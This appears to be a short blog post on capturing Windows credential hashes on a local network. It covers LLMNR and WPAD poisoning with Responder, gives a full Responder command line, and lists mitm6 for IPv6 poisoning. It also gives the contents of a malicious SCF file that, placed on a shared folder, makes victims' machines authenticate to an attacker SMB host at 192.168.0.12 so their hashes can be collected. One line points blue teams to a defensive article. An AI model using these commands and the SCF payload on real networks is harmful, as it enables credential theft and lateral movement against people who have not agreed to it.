There is a few known ways.
The easiest 1st method is to listen to LLMNR broadcast. By Using Responder, our device will publish be the target and the victim will send it’s creds to us as we are acting as MITM (Men in the Middle)
Same goes for 2nd method, which is the WPAD abuse. When a browser is started it will looked for WPAD dns entry, and our device will act as MITM.
Both attacks can be performed with Responder : https://github.com/SpiderLabs/Responder
( responder -I eth1 -v -f -F -P -d -r )
Blueteams : read this article to prevent those simple default windows settings : /defend-against-responder/
The third method will require write access to a share that users are connected to. Create a SCF file with the following content:
[Shell] Command=2 IconFile=\\192.168.0.12\share\test.ico [Taskbar] Command=ToggleDesktop And then run responder on your device. The devices will try to get the icon of the file by connecting to your share. Responder will ask them to authenticate and collect the Hashes ... 4th method Use of MITM6 if the default windows settings has not been changed. Same principal as WPAD but on IPv6 https://github.com/fox-it/mitm61
Recent Comments